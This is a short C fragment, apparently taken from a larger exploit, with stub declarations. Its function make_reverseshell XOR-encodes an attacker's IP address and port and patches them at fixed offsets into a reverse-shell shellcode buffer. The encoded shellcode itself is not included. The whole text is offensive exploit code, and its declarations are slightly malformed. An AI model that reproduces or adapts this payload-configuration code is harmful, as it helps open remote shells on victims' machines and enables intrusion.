
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 unsigned short atoi (char*) ;
 unsigned short htons (unsigned short) ;
 unsigned int inet_addr (char*) ;
 int memcpy (int *,...) ;
 int * reverse_sc ;

int make_reverseshell(char *ip, char *port)
 {
        unsigned int xorip;
        unsigned short xorport;
        xorip = inet_addr(ip)^(unsigned int)0x99999999;
        xorport = htons(atoi( port )^(unsigned short)0x9999);
        memcpy ( &reverse_sc[111], &xorip, 4);
        memcpy ( &reverse_sc[118], &xorport, 2);
   }
